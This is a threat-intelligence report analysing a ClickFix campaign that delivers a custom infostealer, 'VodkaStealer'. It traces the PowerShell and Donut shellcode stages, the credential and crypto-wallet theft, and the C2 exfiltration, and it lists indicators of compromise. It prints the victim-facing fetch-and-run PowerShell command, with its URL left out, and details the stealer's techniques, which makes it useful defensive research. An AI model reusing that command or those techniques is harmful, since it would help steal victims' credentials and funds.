ClickFix Campaign – Russian Threat Actor Evolves to Custom InfoStealer
18 Feb, 2026
Executive Summary
This report provides an update on the ongoing ClickFix campaign that was previously partially analyzed by myself and shared internally. At the time of the earlier investigation, the final payload was identified as Vidar Stealer. Around the same period, the team at LevelBlue published a blog highlighting a separate ClickFix domain that followed the same multi-stage infection chain and leveraged the same download endpoint, although their observed final payload was StealC, the current campaign delivers a new custom stealer, VodkaStealer.
In this current wave, the campaign demonstrates a significant evolution in both malware design and operational infrastructure:
The final payload has transitioned to a custom C/C++ stealer, hereafter referred to as VodkaStealer, replacing previous commodity malware families.
While the download URL remains consistent with prior campaigns, the C2 infrastructure has shifted geographically and technologically, now observed under a US-registered domain and IP.
Operational behaviors such as a Russian keyboard layout kill-switch, custom AES-CTR encrypted C2 communications, and fileless browser data exfiltration techniques indicate a financially motivated private actor, rather than a generic Malware-as-a-Service operation.
Additional observations suggest that the actor is Russian-speaking and operates within the CIS region, with infrastructure rotation spanning Germany, Ukraine, and the USA. The malware is specifically designed to target cryptocurrency wallets, browser credentials, and password manager data using an extensive hardcoded list of browser extensions and wallet IDs.
In summary, the campaign reflects a highly targeted, well-maintained, and evolving threat, demonstrating advanced techniques for evading detection and maintaining persistence while focusing on high-value financial data.
Key Findings
Campaign Evolution & Payload
Previous final payloads: Vidar Stealer and StealC.
Current final payload: VodkaStealer (custom native C/C++ stealer).
Download URL remains unchanged, maintaining operational continuity.
C2 infrastructure rotated from Germany → Ukraine → USA.
Infection Chain
Multi-stage execution process:
Stage 0: Compromised ClickFix domain with fake verification prompts.
Stage 1: PowerShell stager running in-memory scripts.
Stage 2: PowerShell loader performing process injection.
Stage 3: Donut shellcode loader downloading next-stage payload.
Stage 4: Final custom stealer.
Stealth techniques include hidden windows, silent error handling, and process injection.
System & Browser Targeting
Browsers: Google Chrome, Edge, Brave, Opera, Opera GX, Vivaldi, Yandex, Chromium, Firefox, Waterfox, LibreWolf, Pale Moon.
Credential theft:
Extracts stored passwords, cookies, session data.
Specifically targets password manager extensions (Bitwarden, LastPass, 1Password, KeePassXC, Dashlane, NordPass, Keeper, BrowserPass, MYKI, Splikity, CommonKey, ZohoVault).
Cryptocurrency wallets: Over 120 targeted wallet extensions including MetaMask, Phantom, Brave Wallet, Trust Wallet, Coinbase Wallet, Binance Wallet, and more.
Operational Security & Anti-Detection Features
Russian keyboard layout kill-switch avoids domestic systems.
Mutex creation prevents multiple instances.
Uses fileless techniques and in-memory execution to evade AV detection.
Incorporates Chrome ABE bypass via open-source post-exploitation tool (
chromelevator.bin).Process injection into svchost.exe or self-injection fallback.
System Reconnaissance & Profiling
Collects detailed system information:
Windows version, installation date
CPU, GPU, RAM, screen resolution
Locale, timezone, and username
Installed software enumeration (registry-based)
Creates staging directory for collected information.
Captures screenshots for situational awareness.
Exfiltration & Communication
Establishes TCP connection to 178.16.55.40:5555.
Performs AES-CTR encrypted channel handshake with hardcoded key
systeminfo_aes256_channel_key_2024!!.Recursively uploads all collected files after verification of server acknowledgment.
Cleans up local staging files post-exfiltration.
Persistence Indicators
Creates marker file
sysinfo_user_markerto log first execution date/time.Prevents re-infection of the same system.
Attribution & Threat Actor Profile
Likely Russian-speaking actor within the CIS region.
Highly targeted, financially motivated, private actor.
Operational sophistication surpasses standard commodity malware campaigns.
Infection Chain
Technical Analysis
Stage 0: ClickFix Domain
During recent hunting activity focused on ClickFix infrastructure, we identified continued campaign activity with notable payload evolution.
This campaign was previously partially analyzed and findings were shared internally. In the present iteration, although the payload has changed, the download URL pattern remains consistent with previously documented infrastructure, reinforcing linkage to earlier activity.
The domain observed in this wave is: captoolsz[.]com. The domain appears to be compromised or otherwise controlled by a malicious actor and is used to present a fake verification prompt designed to socially engineer victims into executing a malicious command.
The victim is instructed to execute a command that downloads and runs a remote PowerShell script directly in memory using: powershell -c iex(irm -UseBasicParsing)
Infrastructure rotation is evident. The previously documented IP address was 91.92.240.219, while the current observed IP is 158.94.209.33. This indicates active backend management and evasive rotation practices.
Stage 1: Powershell Stager
The initial PowerShell stager displays the message: “Wait please, don't close this window...”
The script then spawns a new hidden PowerShell process using New-Object System.Diagnostics.ProcessStartInfo. The newly created process executes additional PowerShell code that retrieves and executes further payload content directly in memory.
The window style is explicitly set to hidden in order to prevent visible artifacts. If an error occurs during execution, exceptions are silently caught and suppressed, allowing the script to terminate without alerting the user. This behavior reflects deliberate operational stealth.
Stage 2: Powershell Loader
The PowerShell loader retrieves a binary payload from the previously observed endpoint. Rather than executing the file in a conventional manner, the loader performs process injection, enabling the payload to execute in memory without standard disk-based execution artifacts. This stage marks the transition from script-based execution to native code execution, increasing complexity and reducing detection opportunities.
Stage 3: VodkaStealer Loader
The downloaded binary is identified as Donut-generated shellcode, consistent with earlier ClickFix campaign behavior. After decryption using a donut-decryptor, analysis shows that the payload immediately hides its execution window.
The malware calls AdjustTokenPrivileges with SeDebugPrivilege enabled, granting debug privileges required for advanced process injection techniques.
Two primary functions are executed at this stage. The first function downloads the next-stage payload, and the second function locates svchost.exe and performs process injection into it.
The endpoint used to download the next stage is http[:]//94.157.35.115/user_profiles_photo/cptchbuild.bin, which matches previously documented infrastructure.
Stage 4: VodkaStealer
The final payload is again delivered as Donut shellcode. After decryption, previously used Vidar stealer has been replaced with VodkaStealer, a custom native C/C++ stealer.
The stealer begins by hiding its execution window.
It checks the current keyboard layout and terminates execution if the layout is Russian. This behavior suggests either Russian-speaking threat actors or intentional avoidance of infecting Russian systems.
A mutex named sysinfo_single_instance is created to prevent multiple instances of the VodkaStealer from running on the same system.
The VodkaStealer iterates through eight Chromium-based browsers: Google Chrome, Microsoft Edge, Brave, Opera, Opera GX, Vivaldi, Yandex, and Chromium. It checks whether these browsers are installed and then searches for specific hardcoded extension IDs within each browser profile. If matching extensions are found, the browser index is stored for further processing.
VodkaStealer enumerates running processes, identifies active browser processes, and terminates them to unlock browser database files before extracting stored credentials and wallet data.
The stealer queries ip-api.com/json to retrieve the victim’s public IP address and country code.
It generates a victim identifier using the MachineGuid value and retrieves the current UserName.
System reconnaissance includes collecting the Windows product name, installation date, CPU name, CPU core count, GPU information, RAM size, screen resolution, locale information, and time zone using registry queries and Windows APIs.
A working directory is created in the Temp folder for staging collected information with the following format, sysinfo_countrycode_ipaddr_DayMonthYearHourMinute example: sysinfo_IN_8.8.8.8_18020261010
VodkaStealer creates InstalledSoftware.txt and queries the registry paths SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall and SOFTWARE\WOW6432Node\Windows\CurrentVersion\Uninstall to enumerate installed applications. The collected software information is written to InstalledSoftware.txt.
VodkaStealer then proceeds to collect data from Chromium-based browsers, focusing on cryptocurrency wallet extensions and password managers
A screenshot of the victim machine is captured and saved in the staging directory.
The malware then downloads chromelevator.bin from http[:]//94.157.35.115/user_profiles_photo/chromelevator.bin.
It attempts to locate svchost.exe and inject the payload using process injection. If injection into svchost.exe fails, it performs self-injection.
The chromelevator.bin component is an open-source post-exploitation tool designed to bypass Chromium’s App-Bound Encryption (ABE). It uses direct syscalls and reflective process hollowing to launch a legitimate browser process in a suspended state and inject a payload to hijack its security context. This fileless technique enables decryption and exfiltration of sensitive Chromium data, including cookies, saved passwords, and payment information.
It is a open-source tool is available at https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption
VodkaStealer also checks for the presence of Firefox-based browsers, including Firefox, Waterfox, LibreWolf, and Pale Moon. It attempts to harvest credentials and cookies by extracting logins.json, key4.db, cookies.sqlite, and related certificate databases from their profile directories.
In addition to standard browser credential theft, the malware specifically targets Chromium-based password manager extensions. It searches for hardcoded extension IDs associated with password managers including Bitwarden, RoboForm, LastPass, 1Password, KeePassXC, Dashlane, NordPass, Keeper, BrowserPass, MYKI, Splikity, CommonKey, and ZohoVault. If these extensions are installed, the malware attempts to extract stored vault data and associated extension storage files.
VodkaStealer separately targets cryptocurrency wallet browser extensions. It contains an extensive hardcoded list of more than 120 wallet extension IDs. Targeted wallets include MetaMask (multiple IDs), Phantom, Brave Wallet, Trust Wallet, Coinbase Wallet, Binance Wallet, Ronin, Keplr, Rabby, Exodus, Zerion, SafePal, Rainbow, Tonkeeper, Uniswap, XDEFI, Crypto.com, Hashpack, Gero, MathWallet, TrezorPassword, TronLink, TokenPocket, BybitWallet, BackpackWallet, MagicEdenWallet, Temple, PetraAptos, MartianAptos, and PontemAptos.
The malware also collects FileZilla credentials, Telegram Desktop session data, and OpenVPN Connect profiles. All collected data is staged within the central working directory.
It creates a file called systeminfo.txt and writes the below collected information in it.
For exfiltration, the malware validates the target directory and establishes a TCP socket connection to 178.16.55.40 on port 5555. It performs a custom AES-based handshake and establishes two AES-CTR encrypted communication channels. The hardcoded encryption key used is “systeminfo_aes256_channel_key_2024!!”. Below is the directory structure or how it would look like:
The victim identifier is transmitted to the C2 server, and the malware recursively uploads the staged directory contents. It waits for an “OK” confirmation from the server before cleaning up and deleting all staged files.
Finally, the malware creates a marker file in the Temp directory named sysinfo_user_marker. The file records the first execution time in the format “First run: DD/MM/YYYY HH:MM:SS”. This marker is used to indicate that the system has already been infected and processed.
IOC
ClickFix Domain
captoolsz[.]com
Stealer Download Url
http[:]//94.157.35.115/user_profiles_photo/cptchbuild.bin
Chromium ABE bypass component
http[:]//94.157.35.115/user_profiles_photo/chromelevator.bin
Current ClickFix C2 / staging IP
158.94.209.33
Previous infrastructure IP
91.92.240.219
Current TCP socket C2 server for exfiltration
178.16.55.40:5555
Mutex
sysinfo_single_instance
Stealer Loader Download Url
http[:]//94.157.35.115/user_profiles_photo/cptch.bin
cptchbuild.bin
4f6afc69c3151bbc71f86417dbf8cca0eed89b47c66d3e0d8712bfd4eba87a00
cptch.bin
f9eb41e9989ac7ce9c1ece15a7e7c4a0adef1434444598f28c6ba5d20daf1352
chromelevator.bin
c8dbd5335dc0828556e6abc2a804121bf65240719a8a3388a5af6b65065a2d5b
decrypted_cptch.bin
6437db6158ee8fa2d316ba3625ca8df6afdb9304bb3c1e6ee4fb0bcdabb7f212
decrypted_cptchbuild.bin
8720d5388e561835e5496498f61de3132e6e63f2d47964ace897ecb528e2fec3
Last updated